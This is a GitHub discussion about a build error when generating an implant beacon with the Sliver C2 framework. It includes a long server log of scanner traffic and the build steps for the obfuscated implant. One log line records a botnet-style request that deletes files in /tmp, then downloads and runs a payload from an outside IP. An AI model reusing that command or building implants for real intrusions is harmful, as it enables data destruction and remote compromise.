### DISCUSSION TITLE
rpc error: code = Unknown desc = exit status 1

### DISCUSSION THREAD

**Discussion by wearetyomsmnv** [BishopFox/sliver#1472] [General]
rpc error: code = Unknown desc = exit status 1

Hey,i see this when i try generate beacon

i'm install nightly build metasploit-project, but i also see this fail. Why ? How i can solve this problem.

**Comment by moloch--** [comment]
Check the server logs for a more detailed error message (`~/.sliver/logs/sliver.log`)

**Reply by wearetyomsmnv** [reply]
INFO[2023-11-22T09:56:13+03:00] [sliver/server/c2/http.go:396] 198.199.115.11:53770 - /manager/text/list - Mozilla/5.0 zgrab/0.x
INFO[2023-11-22T10:44:53+03:00] [sliver/server/c2/http.go:396] 179.43.163.130:38960 - / - Hello World
INFO[2023-11-22T11:05:47+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 162.142.125.12:43426
ERRO[2023-11-22T11:05:50+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): read tcp 178.20.43.69:8888->162.142.125.12:43426: read: connection reset by peer
ERRO[2023-11-22T11:05:50+03:00] [sliver/server/c2/mtls.go:103] Socket read error read tcp 178.20.43.69:8888->162.142.125.12:43426: read: connection reset by peer
INFO[2023-11-22T11:05:50+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 162.142.125.12:34536
ERRO[2023-11-22T11:05:51+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): tls: client didn't provide a certificate
ERRO[2023-11-22T11:05:51+03:00] [sliver/server/c2/mtls.go:103] Socket read error tls: client didn't provide a certificate
INFO[2023-11-22T11:05:51+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 162.142.125.12:40098
ERRO[2023-11-22T11:05:51+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): tls: client didn't provide a certificate
ERRO[2023-11-22T11:05:51+03:00] [sliver/server/c2/mtls.go:103] Socket read error tls: client didn't provide a certificate
INFO[2023-11-22T11:05:51+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 162.142.125.12:34950
ERRO[2023-11-22T11:05:54+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): tls: first record does not look like a TLS handshake
ERRO[2023-11-22T11:05:54+03:00] [sliver/server/c2/mtls.go:103] Socket read error tls: first record does not look like a TLS handshake
INFO[2023-11-22T11:05:55+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 162.142.125.12:58590
ERRO[2023-11-22T11:05:55+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): read tcp 178.20.43.69:8888->162.142.125.12:58590: read: connection reset by peer
ERRO[2023-11-22T11:05:55+03:00] [sliver/server/c2/mtls.go:103] Socket read error read tcp 178.20.43.69:8888->162.142.125.12:58590: read: connection reset by peer
INFO[2023-11-22T11:07:16+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 64.62.197.170:10165
ERRO[2023-11-22T11:07:16+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): tls: client offered only unsupported versions: [303 302 301]
ERRO[2023-11-22T11:07:16+03:00] [sliver/server/c2/mtls.go:103] Socket read error tls: client offered only unsupported versions: [303 302 301]
INFO[2023-11-22T11:07:19+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 64.62.197.181:59319
ERRO[2023-11-22T11:07:19+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): tls: client didn't provide a certificate
ERRO[2023-11-22T11:07:19+03:00] [sliver/server/c2/mtls.go:103] Socket read error tls: client didn't provide a certificate
INFO[2023-11-22T11:08:44+03:00] [sliver/server/c2/http.go:396] 34.78.6.216:34348 - / - python-requests/2.31.0
INFO[2023-11-22T11:10:54+03:00] [sliver/server/c2/http.go:396] 35.195.93.98:42544 - / - python-requests/2.31.0
INFO[2023-11-22T11:31:06+03:00] [sliver/server/c2/tcp-stager.go:60] Accepted incoming connection: 185.180.143.48:33158
INFO[2023-11-22T11:31:06+03:00] [sliver/server/c2/tcp-stager.go:65] Shellcode size: 9440988
INFO[2023-11-22T11:31:06+03:00] [sliver/server/c2/tcp-stager.go:67] Sending shellcode (9440992)
INFO[2023-11-22T11:46:59+03:00] [sliver/server/c2/http.go:396] 198.235.24.39:53838 - / - Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
INFO[2023-11-22T12:03:44+03:00] [sliver/server/c2/http.go:396] 179.43.163.130:54998 - / - Hello World
INFO[2023-11-22T12:24:42+03:00] [sliver/server/c2/http.go:396] 77.74.177.37:27661 - /GREEN_JELLYFISH.bin.packed.exe - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
INFO[2023-11-22T12:25:32+03:00] [sliver/server/c2/http.go:396] 77.74.177.37:32706 - /UMPDC.dll - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
INFO[2023-11-22T12:25:35+03:00] [sliver/server/c2/http.go:396] 77.74.177.37:27661 - /fde_product_facade.dll - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
INFO[2023-11-22T12:26:39+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 211.254.152.226:58082
ERRO[2023-11-22T12:26:39+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): tls: first record does not look like a TLS handshake
ERRO[2023-11-22T12:26:39+03:00] [sliver/server/c2/mtls.go:103] Socket read error tls: first record does not look like a TLS handshake
INFO[2023-11-22T12:43:47+03:00] [sliver/server/c2/http.go:396] 89.190.156.174:43748 - /cgi/conf.bin - Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
INFO[2023-11-22T13:11:07+03:00] [sliver/server/c2/http.go:396] 138.118.103.77:27770 - / - Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO[2023-11-22T13:17:32+03:00] [sliver/server/c2/http.go:396] 1.224.49.19:40068 - /shell?cd+/tmp;rm+-rf+*;wget+121.62.21.23/jaws;sh+/tmp/jaws - Hello, world
INFO[2023-11-22T13:23:20+03:00] [sliver/server/c2/http.go:396] 179.43.163.130:33558 - / - Hello World
INFO[2023-11-22T13:34:58+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 103.203.58.5:33086
ERRO[2023-11-22T13:34:58+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): tls: first record does not look like a TLS handshake
ERRO[2023-11-22T13:34:58+03:00] [sliver/server/c2/mtls.go:103] Socket read error tls: first record does not look like a TLS handshake
INFO[2023-11-22T13:34:58+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 103.203.58.5:33146
ERRO[2023-11-22T13:34:58+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): tls: first record does not look like a TLS handshake
ERRO[2023-11-22T13:34:58+03:00] [sliver/server/c2/mtls.go:103] Socket read error tls: first record does not look like a TLS handshake
INFO[2023-11-22T13:34:59+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 103.203.58.5:33174
ERRO[2023-11-22T13:34:59+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): tls: first record does not look like a TLS handshake
ERRO[2023-11-22T13:34:59+03:00] [sliver/server/c2/mtls.go:103] Socket read error tls: first record does not look like a TLS handshake
INFO[2023-11-22T13:34:59+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 103.203.58.5:33228
ERRO[2023-11-22T13:35:04+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): unexpected EOF
ERRO[2023-11-22T13:35:04+03:00] [sliver/server/c2/mtls.go:103] Socket read error unexpected EOF
INFO[2023-11-22T13:35:04+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 103.203.58.5:33824
ERRO[2023-11-22T13:35:07+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): EOF
ERRO[2023-11-22T13:35:07+03:00] [sliver/server/c2/mtls.go:103] Socket read error EOF
INFO[2023-11-22T13:35:08+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 103.203.58.5:34218
ERRO[2023-11-22T13:35:08+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): tls: first record does not look like a TLS handshake
ERRO[2023-11-22T13:35:08+03:00] [sliver/server/c2/mtls.go:103] Socket read error tls: first record does not look like a TLS handshake
INFO[2023-11-22T13:35:08+03:00] [sliver/server/c2/mtls.go:85] Accepted incoming connection: 103.203.58.5:34238
ERRO[2023-11-22T13:35:18+03:00] [sliver/server/c2/mtls.go:165] Socket error (read msg-length): EOF
ERRO[2023-11-22T13:35:18+03:00] [sliver/server/c2/mtls.go:103] Socket read error EOF
INFO[2023-11-22T14:37:17+03:00] [sliver/server/c2/http.go:396] 183.136.225.42:24858 - / - Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
INFO[2023-11-22T14:42:15+03:00] [sliver/server/c2/http.go:396] 179.43.163.130:36882 - / - Hello World
INFO[2023-11-22T14:43:36+03:00] [sliver/server/c2/http.go:396] 162.243.128.49:50534 - /portal/redlion - Mozilla/5.0 zgrab/0.x
WARN[2023-11-22T14:44:19+03:00] [google.golang.org/grpc@v1.42.0-dev.0.20211020220737-f00baa6c3c84/internal/grpclog/grpclog.go:46] [core] grpc: Server.Serve failed to create ServerTransport:  connection error: desc = "ServerHandshake(\"118.123.105.85:60896\") failed: remote error: tls: bad certificate"
WARN[2023-11-22T14:44:20+03:00] [google.golang.org/grpc@v1.42.0-dev.0.20211020220737-f00baa6c3c84/internal/grpclog/grpclog.go:46] [core] grpc: Server.Serve failed to create ServerTransport:  connection error: desc = "ServerHandshake(\"118.123.105.85:39670\") failed: tls: client didn't provide a certificate"
WARN[2023-11-22T14:44:20+03:00] [google.golang.org/grpc@v1.42.0-dev.0.20211020220737-f00baa6c3c84/internal/grpclog/grpclog.go:46] [core] grpc: Server.Serve failed to create ServerTransport:  connection error: desc = "ServerHandshake(\"118.123.105.85:41290\") failed: tls: client offered only unsupported versions: [303 302 301]"
WARN[2023-11-22T14:44:20+03:00] [google.golang.org/grpc@v1.42.0-dev.0.20211020220737-f00baa6c3c84/internal/grpclog/grpclog.go:46] [core] grpc: Server.Serve failed to create ServerTransport:  connection error: desc = "ServerHandshake(\"118.123.105.85:41316\") failed: tls: client offered only unsupported versions: [301 302 303]"
WARN[2023-11-22T14:44:21+03:00] [google.golang.org/grpc@v1.42.0-dev.0.20211020220737-f00baa6c3c84/internal/grpclog/grpclog.go:46] [core] grpc: Server.Serve failed to create ServerTransport:  connection error: desc = "ServerHandshake(\"118.123.105.85:41336\") failed: tls: client offered only unsupported versions: [303 302 301]"
WARN[2023-11-22T14:44:22+03:00] [google.golang.org/grpc@v1.42.0-dev.0.20211020220737-f00baa6c3c84/internal/grpclog/grpclog.go:46] [core] grpc: Server.Serve failed to create ServerTransport:  connection error: desc = "ServerHandshake(\"118.123.105.85:41364\") failed: tls: client offered only unsupported versions: [303 302 301]"
WARN[2023-11-22T14:44:22+03:00] [google.golang.org/grpc@v1.42.0-dev.0.20211020220737-f00baa6c3c84/internal/grpclog/grpclog.go:46] [core] grpc: Server.Serve failed to create ServerTransport:  connection error: desc = "ServerHandshake(\"118.123.105.85:43992\") failed: tls: client offered only unsupported versions: [303 302 301]"
WARN[2023-11-22T14:44:24+03:00] [google.golang.org/grpc@v1.42.0-dev.0.20211020220737-f00baa6c3c84/internal/grpclog/grpclog.go:46] [core] grpc: Server.Serve failed to create ServerTransport:  connection error: desc = "ServerHandshake(\"118.123.105.85:47982\") failed: tls: client offered only unsupported versions: [302 301]"
WARN[2023-11-22T14:44:30+03:00] [google.golang.org/grpc@v1.42.0-dev.0.20211020220737-f00baa6c3c84/internal/grpclog/grpclog.go:46] [core] grpc: Server.Serve failed to create ServerTransport:  connection error: desc = "ServerHandshake(\"118.123.105.85:48966\") failed: tls: no cipher suite supported by both client and server"
WARN[2023-11-22T14:44:32+03:00] [google.golang.org/grpc@v1.42.0-dev.0.20211020220737-f00baa6c3c84/internal/grpclog/grpclog.go:46] [core] grpc: Server.Serve failed to create ServerTransport:  connection error: desc = "ServerHandshake(\"118.123.105.85:49010\") failed: tls: client didn't provide a certificate"
WARN[2023-11-22T14:44:33+03:00] [google.golang.org/grpc@v1.42.0-dev.0.20211020220737-f00baa6c3c84/internal/grpclog/grpclog.go:46] [core] grpc: Server.Serve failed to create ServerTransport:  connection error: desc = "ServerHandshake(\"118.123.105.85:49058\") failed: tls: client didn't provide a certificate"
WARN[2023-11-22T15:10:46+03:00] [google.golang.org/grpc@v1.42.0-dev.0.20211020220737-f00baa6c3c84/internal/grpclog/grpclog.go:46] [core] grpc: Server.Serve failed to create ServerTransport:  connection error: desc = "ServerHandshake(\"45.56.108.128:42088\") failed: tls: client didn't provide a certificate"
WARN[2023-11-22T15:10:46+03:00] [google.golang.org/grpc@v1.42.0-dev.0.20211020220737-f00baa6c3c84/internal/grpclog/grpclog.go:46] [core] grpc: Server.Serve failed to create ServerTransport:  connection error: desc = "ServerHandshake(\"45.56.108.128:42102\") failed: tls: client didn't provide a certificate"
INFO[2023-11-22T15:10:58+03:00] [sliver/server/configs/database.go:56] Loading config from /root/.sliver/configs/database.json
INFO[2023-11-22T15:10:58+03:00] [sliver/server/configs/database.go:56] Loading config from /root/.sliver/configs/database.json
INFO[2023-11-22T15:10:58+03:00] [sliver/server/configs/database.go:122] Saving config to /root/.sliver/configs/database.json
INFO[2023-11-22T15:10:58+03:00] [sliver/server/db/sql_cgo.go:35] sqlite -> file:/root/.sliver/sliver.db?
INFO[2023-11-22T15:10:58+03:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.2.2/logging/logrus/options.go:211] finished unary call with code OK
INFO[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:715] CC not found in ENV, using default paths
WARN[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:727] CC path '/opt/osxcross/target/bin/o64-clang' does not exist
WARN[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:730] CXX path '' does not exist
INFO[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:715] CC not found in ENV, using default paths
WARN[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:727] CC path '/opt/osxcross/target/bin/aarch64-apple-darwin20.2-clang' does not exist
WARN[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:730] CXX path '' does not exist
INFO[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:715] CC not found in ENV, using default paths
WARN[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:730] CXX path '' does not exist
INFO[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:715] CC not found in ENV, using default paths
WARN[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:730] CXX path '' does not exist
INFO[2023-11-22T15:14:45+03:00] [sliver/server/gogo/go.go:171] go cmd: '/root/.sliver/go/bin/go tool dist list'
INFO[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:715] CC not found in ENV, using default paths
WARN[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:727] CC path '/opt/osxcross/target/bin/o64-clang' does not exist
WARN[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:730] CXX path '' does not exist
INFO[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:715] CC not found in ENV, using default paths
WARN[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:727] CC path '/opt/osxcross/target/bin/aarch64-apple-darwin20.2-clang' does not exist
WARN[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:730] CXX path '' does not exist
INFO[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:715] CC not found in ENV, using default paths
WARN[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:730] CXX path '' does not exist
INFO[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:715] CC not found in ENV, using default paths
WARN[2023-11-22T15:14:45+03:00] [sliver/server/generate/binaries.go:730] CXX path '' does not exist
INFO[2023-11-22T15:14:45+03:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.2.2/logging/logrus/options.go:211] finished unary call with code OK
INFO[2023-11-22T15:14:45+03:00] [sliver/server/rpc/rpc-generate.go:183] Saving new profile with name "funny_bytes"
INFO[2023-11-22T15:14:45+03:00] [sliver/server/db/logger.go:20] github.com/bishopfox/sliver/server/db/helpers.go:132 record not found
[0.641ms] [rows:0] SELECT * FROM `implant_profiles` WHERE `implant_profiles`.`name` = "funny_bytes" ORDER BY `implant_profiles`.`id` LIMIT 1
INFO[2023-11-22T15:14:45+03:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.2.2/logging/logrus/options.go:211] finished unary call with code OK
INFO[2023-11-22T15:15:00+03:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.2.2/logging/logrus/options.go:211] finished unary call with code OK
INFO[2023-11-22T15:15:00+03:00] [sliver/server/configs/server.go:47] Loading config from /root/.sliver/configs/server.json
INFO[2023-11-22T15:15:00+03:00] [sliver/server/configs/server.go:47] Loading config from /root/.sliver/configs/server.json
INFO[2023-11-22T15:15:00+03:00] [sliver/server/configs/server.go:152] Saving config to /root/.sliver/configs/server.json
INFO[2023-11-22T15:15:00+03:00] [sliver/server/gogo/go.go:171] go cmd: '/root/.sliver/go/bin/go tool dist list'
INFO[2023-11-22T15:15:00+03:00] [sliver/server/certs/certs.go:145] Generating TLS certificate (ECC) for 'UNUSUAL_TOPIC' ...
INFO[2023-11-22T15:15:00+03:00] [sliver/server/certs/certs.go:70] Saving certificate for cn = 'UNUSUAL_TOPIC'
INFO[2023-11-22T15:15:00+03:00] [sliver/server/assets/assets.go:233] Creating GOPATH directory: /root/.sliver/slivers/windows/amd64/UNUSUAL_TOPIC/src
WARN[2023-11-22T15:15:00+03:00] [sliver/server/generate/canaries.go:70] No parent domains
INFO[2023-11-22T15:15:00+03:00] [sliver/server/generate/binaries.go:646] Rendering go.mod file ...
INFO[2023-11-22T15:15:00+03:00] [sliver/server/gogo/go.go:171] go cmd: '/root/.sliver/go/bin/go mod tidy -compat=1.17'
INFO[2023-11-22T15:15:04+03:00] [sliver/server/gogo/go.go:171] go cmd: '/root/.sliver/go/bin/go tool dist list'
INFO[2023-11-22T15:15:04+03:00] [sliver/server/gogo/go.go:171] go cmd: '/root/.sliver/go/bin/go tool dist list'
INFO[2023-11-22T15:15:04+03:00] [sliver/server/gogo/go.go:95] Low system memory, disable large literal obfuscation
INFO[2023-11-22T15:15:04+03:00] [sliver/server/gogo/go.go:133] garble cmd: '/root/.sliver/go/bin/garble -seed=random -literals build -trimpath -ldflags -s -w -buildid= -H=windowsgui -buildmode=pie -o /root/.sliver/slivers/windows/amd64/UNUSUAL_TOPIC/bin/UNUSUAL_TOPIC.bin .'
ERRO[2023-11-22T15:15:59+03:00] [sliver/server/gogo/go.go:140] --- stdout ---

ERRO[2023-11-22T15:15:59+03:00] [sliver/server/gogo/go.go:141] --- stderr ---
# golang.org/x/crypto/ssh
ePiSaGqe.go:1: cannot convert jDz1KQ4Y (variable of type cruKP9Sq) to type g9zGyzPe
exit status 2
exit status 2

ERRO[2023-11-22T15:15:59+03:00] [sliver/server/gogo/go.go:142] exit status 1
ERRO[2023-11-22T15:15:59+03:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.2.2/logging/logrus/options.go:215] finished unary call with code Unknown
INFO[2023-11-22T15:16:35+03:00] [sliver/server/rpc/rpc-events.go:23] 4 client disconnected
INFO[2023-11-22T15:16:35+03:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.2.2/logging/logrus/options.go:211] finished streaming call with code OK
WARN[2023-11-22T15:16:35+03:00] [sliver/server/rpc/rpc-tunnel.go:126] Error on stream recv rpc error: code = Canceled desc = context canceled
INFO[2023-11-22T15:16:35+03:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.2.2/logging/logrus/options.go:211] finished streaming call with code Canceled

**Reply by moloch--** [reply]
Did you compile this version yourself? If so pull the latest `master`. Note that the `master` branch is unstable* right now and we recommend using release versions if you're not a developer.

**Comment by wearetyomsmnv** [comment]
I'm using stable versions... but the error doesn't go anywhere. golang - 1.21.4
